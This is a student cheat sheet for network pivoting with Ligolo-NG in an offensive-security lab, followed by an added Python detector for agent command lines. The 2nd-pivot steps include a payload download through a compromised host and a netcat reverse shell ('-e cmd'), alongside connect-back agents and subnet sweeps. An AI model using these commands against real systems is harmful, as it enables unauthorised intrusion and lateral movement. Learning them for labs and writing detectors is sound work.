I saw plenty of students struggling with Ligolo-NG, so to avoid losing time, once you have read THIS to understand the logic, you can work from this quick table.
I recommend using the most stable version 0.6.2 of Ligolo-NG (never failed me)
Download the 3 files:
PROXY -> here
AGENT.EXE for Windows -> here
AGENT for Linux -> here
Setup with your configuration
NOTE: auto-derives 10.10.10.0/24 range
NOTE: auto-derives 11.11.11.0/24 range
1st Pivot on 1st internal range
1) Create and bring up tunnel1 (kali terminal)
NOTE: requires sudo rights
sudo ip tuntap add user root mode tun tunnel1
sudo ip link set tunnel1 up
2) Start Ligolo proxy server on Kali (again sudo rights)
sudo ./proxy -selfcert
3) Upload agent.exe / agent and connect back to Kali Ligolo Server
NOTE: on the 1st target machine, run the agent.exe / agent to connect to your TUN0 IP
.\agent.exe -connect 192.168.45.176:11601 -ignore-cert
./agent -connect 192.168.45.176:11601 -ignore-cert
4) In Ligolo proxy ui: select the agent and start tunnel1
Note: once connected press Enter and select the agent with arrows, then run:
start --tun tunnel1
5) Add route to the target subnet
Note: this command is done in a new Kali terminal
sudo ip route add 10.10.10.0/24 dev tunnel1
6) Listener on tunnel1
Note: lets new hosts reach the proxy to establish tunnels
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
7) Test reachability using netexec
netexec smb 10.10.10.0/24
2nd Pivot on 2nd internal range
1) Create and bring up tunnel2 (kali terminal)
NOTE: repeating the first steps but for tunnel2 now as follows
sudo ip tuntap add user root mode tun tunnel2
sudo ip link set tunnel2 up
2) Connect new agent (from 2nd target) to 1st target internal IP
.\agent.exe -connect 10.10.10.10:11601 -ignore-cert
3) Once connected in the proxy UI, select with the arrows the new connection that appeared in proxy and hit enter
NOTE: make sure you are on the right connection. Once selected, attach it to tunnel2 with:
start --tun tunnel2
4) Add route to 2nd internal subnet
NOTE: using the 2nd target internal IP
sudo ip route add 11.11.11.0/24 dev tunnel2
5) Add listeners for whitelisted ports (443, 80) - PORT FORWARDING STEP
NOTE: using whitelisted ports like 443, 80 (this will work most of the time)
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443 --tcp
listener_add --addr 0.0.0.0:80 --to 127.0.0.1:80 --tcp
6) Download from 2nd target using 1st internal
wget http://10.10.10.10/ph03n1x -outfile ph03n1x
7) Catch reverse shell from 2nd target on your Kali IP
NOTE: using whitelisted ports like 443, 80 (this will work most of the time)
nc64.exe 10.10.10.10 443 -e cmd
8) Test reachability on 2nd subnet
netexec smb 11.11.11.0/24
Local Port Forwarding to your Kali
Have you found a website that's accessible only from the target, or a service that runs only on the target machine?
Then it's time to do a local port forwarding, fast and easy, where you don't need proxychains to reach it!
Works in terminal (with any tool to be reached) and Firefox (if it’s a website)
1) On your Kali terminal, create a new network called ligolo
NOTE: requires sudo rights
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
2) Connect agent to your proxy
NOTE: this uses your TUN0 IP dynamically
.\agent.exe -connect 192.168.45.176:11601 -ignore-cert
3) In proxy UI, select the new connection and attach it to ligolo
start --tun ligolo
4) Add the magic route to access all internal ports locally on Kali
sudo ip route add 240.0.0.1/32 dev ligolo
Now you can access any local port directly via 240.0.0.1 from Kali
5) Verify forwarding with Nmap
NOTE: you should see the local ports running on the target (previously visible only on the target itself).
Now they are reachable from Kali without proxychains.
nmap -p- 240.0.0.1
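Detection side of the same workflow: every agent start in the steps above has the shape "-connect host:port -ignore-cert", whatever the binary is called. The script below is an added example, not part of the original page or of Ligolo-NG. It scans process-creation records for that shape and marks agents whose destination lies inside the internal ranges, which is the relay case from the 2nd pivot. The record format, the host names and INTERNAL_NETS (set to this page's lab ranges) are assumptions.

```python
import ipaddress
import re

# Match on the flags shown on this page, not on the binary name, which is
# trivially renamed. The "--flag" and "-flag=value" spellings are matched
# too (assumption: the agent accepts Go-style flag syntax).
CONNECT_RE = re.compile(r"(?:^|\s)-{1,2}connect[\s=]+(\S+):(\d{1,5})(?=\s|$)")
IGNORE_CERT_RE = re.compile(r"(?:^|\s)-{1,2}ignore-cert(?=\s|$)")

# Internal ranges the defender owns (assumption: this page's lab subnets).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.10.10.0/24", "11.11.11.0/24")]

# Constructed sample records: (reporting host, process command line).
SAMPLE_EVENTS = [
    ("WS01", r".\agent.exe -connect 192.168.45.176:11601 -ignore-cert"),
    ("WEB02", "./updater -connect 192.168.45.176:11601 -ignore-cert"),
    ("DB03", r"C:\Temp\svc.exe -connect 10.10.10.10:11601 -ignore-cert"),
    ("WS01", "curl --connect-timeout 5 https://intranet.example/health"),
]


def scan(events, internal_nets=INTERNAL_NETS):
    """Return one finding per command line that looks like an agent start."""
    findings = []
    for host, cmdline in events:
        m = CONNECT_RE.search(cmdline)
        if not m:
            continue
        dest, port = m.group(1), int(m.group(2))
        try:
            addr = ipaddress.ip_address(dest)
            relay = any(addr in net for net in internal_nets)
        except ValueError:
            relay = False  # destination is a hostname; not resolved here
        findings.append({
            "host": host,
            "dest": f"{dest}:{port}",
            # Skipped certificate validation raises confidence in the match.
            "ignore_cert": bool(IGNORE_CERT_RE.search(cmdline)),
            # Destination inside our own ranges: another internal host is
            # relaying for the proxy (listener_add on an earlier agent).
            "internal_relay": relay,
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A finding with internal_relay set also points at the relaying host (10.10.10.10 in the sample), which should then be checked for an unexpected listening port.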


